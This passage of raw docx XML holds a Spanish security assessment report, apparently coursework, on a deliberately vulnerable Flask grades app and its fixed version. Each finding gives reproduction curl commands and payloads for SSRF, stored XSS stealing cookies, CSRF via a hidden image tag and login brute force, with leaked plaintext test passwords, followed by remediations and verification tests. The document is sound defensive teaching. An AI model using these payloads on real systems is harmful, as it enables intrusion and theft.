    </w:p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Evidencia VUL-04 - recarga de Werkzeug tras sobrescribir app.py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Correccion aplicada en la V2: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Control implementado (V2):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EXT_ALLOWED = {"pdf", "png", "jpg", "jpeg", "txt"}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if ext not in EXT_ALLOWED: return "Tipo de archivo no permitido"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nombre = str(uuid.uuid4()) + secure_filename(ext)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archivo.save(os.path.join(UPLOAD_DIR, nombre))  # fuera del webroot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Probe 10 V2: subir un .html malicioso responde "Tipo de archivo no permitido". Este PoC es destructivo y se documento sin ejecutar sobre el repositorio real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5 VUL-05 SSRF - /estudiantes/importar-foto y /cursos/importar-silabo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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-05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Categoria OWASP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A10 - SSRF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CWE (MITRE)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CWE-918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Criticidad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Alta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Endpoint / ruta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POST /estudiantes/importar-foto, POST /cursos/importar-silabo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Causa raiz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requests.get(url) sobre URL controlada por el cliente, sin allowlist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Impacto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El servidor accede a servicios internos (loopback, metadata, red interna)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 9. Ficha tecnica VUL-05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Reproduccion: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Comando/payload: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1. Alcanzar recurso interno del propio servidor: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curl -b cookies.txt \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 xml:space="preserve">  --data-urlencode "estudiante_id=1" \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 xml:space="preserve">  --data-urlencode "url=http://127.0.0.1:5001/login" \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 xml:space="preserve">  http://localhost:5001/estudiantes/importar-foto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2. SSRF ciego hacia un host interno inexistente (puerto 9999):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curl -b cookies.txt --data-urlencode "curso_id=1" \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 xml:space="preserve">  --data-urlencode "url=http://10.0.0.99:9999/" \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 xml:space="preserve">  http://localhost:5001/cursos/importar-silabo</w:t>
      </w:r>
    </w:p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Evidencia VUL-05 - reproduccion del ataque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Evidencia obtenida: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Salida real (comportamiento observado):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Caso 1: el servidor descarga su propio /login y lo guarda como "foto"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(foto_est1_usuarios en la base) - prueba de acceso a loopback.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Caso 2: al no haber try/except, Werkzeug devuelve el traceback con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requests.exceptions.ConnectionError - permite escaneo de puertos via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errores diferenciados (SSRF ciego basado en errores).</w:t>
      </w:r>
    </w:p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Evidencia VUL-05 - acceso a loopback y traceback de ConnectionError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Correccion aplicada en la V2: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Control implementado (V2):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/importar: se bloquean IPs no publicas (RFC1918, loopback, link-local)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y se prohiben las redirecciones HTTP.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if es_privada(url): return "URL no permitida", 403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Probe 8 V2: URLs a 169.254.169.254 (metadata), localhost y 192.168.1.1 devuelven 403 en los tres casos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.6 VUL-06 XSS Almacenado - filtro |safe y upload de .html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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-06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Categoria OWASP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A08 - Software and Data Integrity Failures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CWE (MITRE)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CWE-79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Criticidad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Alta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Endpoint / ruta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POST /notas/crear (vector observaciones); /archivos/subir + /static/uploads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Causa raiz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Filtro |safe en templates/notas.html; static/uploads sirve .html sin restriccion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Impacto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Ejecucion de JavaScript en sesion de otros usuarios (robo de cookies, escalada)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 10. Ficha tecnica VUL-06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Reproduccion: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Comando/payload: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Vector 1 - campo observaciones renderizado con |safe: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curl -b cookies.txt \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 xml:space="preserve">  --data-urlencode "estudiante_id=1" --data-urlencode "curso_id=1" \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 xml:space="preserve">  --data-urlencode "nota=15" --data-urlencode "ciclo=2026-I" \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 xml:space="preserve">  --data-urlencode "observaciones=&lt;script&gt;alert(1)&lt;/script&gt;" \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 xml:space="preserve">  http://localhost:5001/notas/crear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Vector 2 - subir un .html malicioso y servirlo en el mismo dominio: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echo '&lt;script&gt;alert(document.cookie)&lt;/script&gt;' &gt; malicioso.html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curl -b cookies.txt -F "archivo=@malicioso.html" http://localhost:5001/archivos/subir</w:t>
      </w:r>
    </w:p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Evidencia VUL-06 - reproduccion del ataque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Evidencia obtenida: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Salida real (HTML renderizado):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templates/notas.html (V1):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&lt;td&gt;{{ nota.observaciones|safe if nota.observaciones else '' }}&lt;/td&gt;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Al abrir /notas, el &lt;script&gt; se renderiza y ejecuta sin escapar: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&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p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Evidencia VUL-06 - script renderizado sin escapar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Correccion aplicada en la V2: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Control implementado (V2):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Auto-escaping de Jinja2 (sin |safe) + Content Security Policy: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response.headers['Content-Security-Policy'] = \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 xml:space="preserve">    "default-src 'self'; style-src 'self' 'unsafe-inline' cdn.jsdelivr.net"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response.headers["X-Content-Type-Options"] = "nosniff"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>En la V2, los uploads .html se rechazan por extension/MIME y los archivos se descargan como as_attachment (no se ejecutan).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.7 VUL-07 Broken Access Control - escalada a /admin/usuarios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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-07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Categoria OWASP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A01 - Broken Access Control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CWE (MITRE)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CWE-862, CWE-269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Criticidad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Critica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Endpoint / ruta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GET /admin/usuarios, /estudiantes/eliminar/1, /cursos/crear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Causa raiz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session["rol"] se guarda pero ningun endpoint lo verifica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Impacto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Un docente accede al panel de administracion y ve las passwords en plano</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 11. Ficha tecnica VUL-07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Reproduccion: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Comando/payload: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curl -c cookies_doc.txt -d "username=profesor&amp;password=profesor" \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 xml:space="preserve">  http://localhost:5001/login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curl -b cookies_doc.txt http://localhost:5001/admin/usuarios</w:t>
      </w:r>
    </w:p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Evidencia VUL-07 - reproduccion del ataque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Evidencia obtenida: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Salida real (/admin/usuarios como docente):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El docente obtiene la lista completa de usuarios con passwords en plano,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aunque el enlace "Usuarios" no aparece en su menu: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| id | username | password | rol      |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|----|----------|----------|----------|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| 1  | admin    | admin123 | admin    |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| 2  | profesor | profesor | docente  |</w:t>
      </w:r>
    </w:p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Evidencia VUL-07 - password de admin visible para el docente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Correccion aplicada en la V2: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Control implementado (V2):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@admin_required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def admin_usuarios(): ...   # solo rol admin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Docente: 403 en /importar, /diagnostico, /admin/usuarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Probe 11 V2: el docente recibe 403 en /importar y /diagnostico; el CRUD docente es de solo lectura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.8 VUL-08 CSRF - eliminaciones por GET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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-08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Categoria OWASP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A01 - Broken Access Control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CWE (MITRE)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CWE-352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Criticidad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Alta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Endpoint / ruta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GET /estudiantes/eliminar/&lt;id&gt;, /cursos/eliminar, /notas/eliminar, /archivos/eliminar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Causa raiz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Eliminaciones por GET sin token CSRF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Impacto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Un visitante malicioso fuerza la eliminacion de datos en la sesion de un admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 12. Ficha tecnica VUL-08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Reproduccion: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Comando/payload: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Pagina maliciosa que, al ser visitada por un admin con sesion activa,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elimina el estudiante 3 (el navegador envia la cookie de sesion sola):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&lt;img src="http://localhost:5001/estudiantes/eliminar/3" style="display:none"&gt;</w:t>
      </w:r>
    </w:p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Evidencia VUL-08 - reproduccion del ataque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Evidencia obtenida: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Salida real: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GET /estudiantes/eliminar/3  -&gt;  HTTP/1.1 302 FOUND  (registro eliminado)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La eliminacion se acepta sin token alguno ni confirmacion POST.</w:t>
      </w:r>
    </w:p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Evidencia VUL-08 - eliminacion aceptada por GET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Correccion aplicada en la V2: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Control implementado (V2):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Deletes solo por POST + token CSRF (Flask-WTF):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GET /estudiantes/eliminar/1 -&gt; 405 Method Not Allowed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POST sin csrf_token        -&gt; 400 Bad Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Probes 4 y 5 V2: POST sin token responde 400; GET delete responde 405. Ninguno elimina datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.9 VUL-09 Fallas criptograficas - passwords en texto plano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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-09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Categoria OWASP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A02 - Cryptographic Failures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CWE (MITRE)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CWE-256, CWE-798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Criticidad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Critica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Endpoint / ruta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Base de datos usuarios (init_db.py); app.secret_key en app.py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Causa raiz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Passwords sin hashing; secret_key hardcodeada "12345"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Impacto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Credenciales legibles ante un dump; forja de cookies de sesion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 13. Ficha tecnica VUL-09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Reproduccion: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Comando/payload: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El dump de sqlmap (VUL-02) devuelve los passwords en claro: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cat docs/sqlmap_evidence/estudiantes/localhost/dump/SQLite_masterdb/usuarios.csv</w:t>
      </w:r>
    </w:p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Evidencia VUL-09 - reproduccion del ataque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Evidencia obtenida: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Salida real (CSV + codigo):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id,rol,password,username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1,admin,admin123,admin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2,docente,profesor,profesor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Y en app.py (V1):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app.secret_key = '12345'</w:t>
      </w:r>
    </w:p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Evidencia VUL-09 - passwords en texto plano y secret hardcodeado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Correccion aplicada en la V2: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Control implementado (V2):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hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))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if bcrypt.checkpw(password, user['password'].encode()): ...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app.secret_key = os.getenv("SECRET_KEY")   # desde .env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>En la V2 los passwords se guardan con bcrypt cost factor 12; un dump no expone las credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.10 VUL-10 Componentes vulnerables - CVE-2024-34069 (Werkzeug 3.0.1)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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-10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Categoria OWASP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A06 - Vulnerable and Outdated Components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CWE (MITRE)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CWE-1104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Criticidad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Media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Endpoint / ruta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Dependencia Werkzeug==3.0.1 (requirements.txt)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Causa raiz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Version de Werkzeug afectada por CVE-2024-34069 (PIN del debugger predecible)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Impacto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Ejecucion arbitraria de codigo si el atacante alcanza el debugger interactivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 14. Ficha tecnica VUL-10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Reproduccion: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Comando/payload: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python -c "import importlib.metadata as m; print(m.version('werkzeug'))"</w:t>
      </w:r>
    </w:p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Evidencia VUL-10 - reproduccion del ataque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Evidencia obtenida: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Salida real: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3.0.1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requirements.txt (V1):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Flask==3.0.3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Werkzeug==3.0.1    &lt;- vulnerable a CVE-2024-34069</w:t>
      </w:r>
    </w:p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Evidencia VUL-10 - version de Werkzeug instalada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Correccion aplicada en la V2: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Control implementado (V2):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Werkzeug&gt;=3.0.3    # corrige CVE-2024-34069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Dependencias validadas con Safety (SCA) en el pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CVE-2024-34069 permite predecir el PIN del debugger de Werkzeug en ciertos entornos (por ejemplo, contenedores con machine-id predecible).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.11 VUL-11 Security Misconfiguration - debug=True y trazas expuestas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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-11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Categoria OWASP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A05 - Security Misconfiguration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CWE (MITRE)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CWE-209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Criticidad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Alta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Endpoint / ruta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app.py (app.run(debug=True)); cualquier excepcion no controlada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Causa raiz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Modo debug activo en un entorno expuesto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Impacto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Exposicion de tracebacks con rutas absolutas, variables locales y el debugger interactivo de Werkzeug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 15. Ficha tecnica VUL-11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Reproduccion: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Comando/payload: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Provocar una excepcion no controlada (SQLi que rompe la sintaxis):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curl -b cookies.txt --data-urlencode "host=' " http://localhost:5001/diagnostico</w:t>
      </w:r>
    </w:p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Evidencia VUL-11 - reproduccion del ataque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Evidencia obtenida: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Salida real (pagina de error):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Werkzeug devuelve el debugger interactivo con el traceback completo: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 - versiones exactas de Werkzeug/Python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 - rutas absolutas del sistema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 - codigo fuente y variables locales del stack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 - formulario "Debugger PIN" (explotable con CVE-2024-34069)</w:t>
      </w:r>
    </w:p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Evidencia VUL-11 - traceback y debugger expuestos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Correccion aplicada en la V2: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Control implementado (V2):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debug=False + paginas de error personalizadas sin trazas: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@app.errorhandler(404) -&gt; render_template("404.html")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@app.errorhandler(500) -&gt; render_template("500.html")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Probe 6 V2: una ruta inexistente responde 404 con pagina personalizada, sin tracebacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.12 VUL-12 Fuerza bruta sin limite - ausencia de rate limiting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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-12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Categoria OWASP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A04 / A07 - Insecure Design y Auth Failures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CWE (MITRE)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CWE-307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Criticidad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Alta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Endpoint / ruta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POST /login (sin rate limit ni lockout)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Causa raiz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No hay limitacion de peticiones ni bloqueo de cuenta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Impacto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Fuerza bruta sin restricciones sobre las credenciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 16. Ficha tecnica VUL-12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Reproduccion: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Comando/payload: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for i in $(seq 1 30); do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 xml:space="preserve">  curl -s -o /dev/null -w "%{http_code}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" \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 xml:space="preserve">    -d "username=admin&amp;password=intento$i" http://localhost:5001/login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done</w:t>
      </w:r>
    </w:p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Evidencia VUL-12 - reproduccion del ataque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Evidencia obtenida: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Salida real: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Las 30 peticiones se procesan sin ningun 429, captcha ni bloqueo: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200 200 200 200 200 200 200 200 200 200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200 200 200 200 200 200 200 200 200 200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200 200 200 200 200 200 200 200 200 200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Y ninguna peticion queda registrada (ver VUL-13).</w:t>
      </w:r>
    </w:p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Evidencia VUL-12 - sin limite de intentos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Correccion aplicada en la V2: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Control implementado (V2):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Flask-Limiter: 5 intentos fallidos/minuto -&gt; 429 Too Many Requests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Lockout de cuenta: 5 fallos consecutivos -&gt; bloqueo de 10 minutos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Probe 12 V2: el sexto POST en menos de un minuto responde 429 (rate-limit).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.13 VUL-13 Fallas de logging y monitoreo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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-13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Categoria OWASP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A09 - Logging and Monitoring Failures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CWE (MITRE)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CWE-778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Criticidad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Media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Endpoint / ruta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Toda la aplicacion (app.py no registra eventos)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Causa raiz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Ausencia total de logging de seguridad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Impacto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Los ataques de esta guia son indetectables; no hay auditoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 17. Ficha tecnica VUL-13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Reproduccion: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Comando/payload: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Repetir cualquiera de los ataques anteriores (SQLi, RCE, SSRF, fuerza bruta)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find . -name "*.log"     # y comprobar que no existe ningun log de seguridad</w:t>
      </w:r>
    </w:p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Evidencia VUL-13 - reproduccion del ataque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Evidencia obtenida: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Salida real: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No existe ningun archivo de log en el proyecto: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(ningun resultado)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La unica salida es el access log de desarrollo de Werkzeug, sin persistencia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ni distincion entre trafico legitimo y ataques.</w:t>
      </w:r>
    </w:p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Evidencia VUL-13 - ausencia de registros de auditoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Correccion aplicada en la V2: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Control implementado (V2):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security.log: logins fallidos, subidas de archivos, acciones de admin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logger.info(f"Login exitoso: {username}")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logger.warning(f"Login fallido: {username} desde {ip}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>La V2 registra intentos de login, subidas y acciones administrativas en security.log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/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6. Verificacion de la V2 (bloqueo de los ataques)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La V2 desplegada en https://localhost se verifico con 12 probes no destructivos (script scripts/verificar_v2.ps1). El resumen fue PASS=18 FAIL=0 (los probes 1, 2, 8 y 11 ejecutan multiples comprobaciones).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/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Probe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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Resultado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HTTP -&gt; HTTPS (redirect 301)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PASS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Headers de seguridad (HSTS, CSP, X-Frame-Options, nosniff)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PASS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SQLi en login sin bypass (200)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PASS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POST sin token CSRF -&gt; 400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PASS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Delete por GET -&gt; 405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PASS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Ruta inexistente -&gt; 404 personalizado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PASS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RCE (whoami) -&gt; "Comando no permitido"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PASS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SSRF a metadata/loopback/RFC1918 -&gt; 403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PASS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SQLi UNION sin fuga de hashes bcrypt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PASS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Upload .html malicioso -&gt; "Tipo no permitido"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PASS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RBAC docente en /importar y /diagnostico -&gt; 403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PASS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Fuerza bruta -&gt; 429 (rate-limit)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/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 18. Probes no destructivos contra la V2 (PASS=18, FAIL=0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adicionalmente, la V2 cuenta con 59 tests automatizados (11 archivos) que cubren cada correccion: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2"/>
              </w:rPr>
              <w:t>Archivo de tests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2"/>
              </w:rPr>
              <w:t>Verificacion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test_sqli.py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SQLi no funciona en busqueda ni login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test_auth.py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Login correcto/incorrecto y hashing bcrypt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test_upload.py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Extensiones no permitidas rechazadas y magic bytes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test_rbac.py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RBAC: docente solo lectura, admin CRUD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test_csrf_delete.py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Deletes solo por POST + token CSRF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test_errors.py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Paginas 403/404/500 sin trazas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test_cookies.py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Cookies HttpOnly/SameSite/Secure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test_ssrf.py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SSRF bloqueado en /importar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test_diagnostico.py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RCE bloqueado en /diagnostico (allowlist)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test_lockout.py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Lockout de cuenta tras intentos fallidos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test_base.py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2"/>
              </w:rPr>
              <w:t>Configuracion compartida del test client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 19. Tests automatizados de seguridad de la V2 (59/59)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7. Resumen de resultados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/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>VUL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/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilidad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/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>OWASP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/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Criticidad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/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>V1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/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>V2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VUL-01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SQLi - bypass login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A03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Critica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Explotada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Bloqueada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VUL-02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SQLi - UNION + dump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A03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Critica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Explotada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Bloqueada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VUL-03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RCE /diagnostico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A03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Critica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Explotada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Bloqueada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VUL-04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RCE upload + traversal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A03/A08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Critica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PoC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Bloqueada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VUL-05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SSRF importar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A10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Alta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Explotada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Bloqueada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VUL-06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XSS almacenado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A08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Alta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Explotada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Bloqueada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VUL-07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Broken Access Control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A01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Critica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Explotada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Bloqueada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VUL-08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CSRF delete GET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A01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Alta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Explotada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Bloqueada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VUL-09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Fallas criptograficas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A02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Critica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Presente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Corregida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VUL-10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Componentes vulnerables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A06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Media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Presente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Corregida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VUL-11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Misconfiguration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A05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Alta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Explotada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Bloqueada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VUL-12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Fuerza bruta sin limite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A04/A07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Alta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Explotada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Bloqueada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VUL-13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Logging y monitoreo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A09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Media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Ausente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sz w:val="22"/>
              </w:rPr>
              <w:t>Implementado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tabla 20. Resumen de resultados V1 vs V2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Total: 13 vulnerabilidades documentadas. 10 de las 10 categorias de OWASP Top 10 2021 estan cubiertas en la V1 de forma explotable, y todas se corrigen o bloquean en la V2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
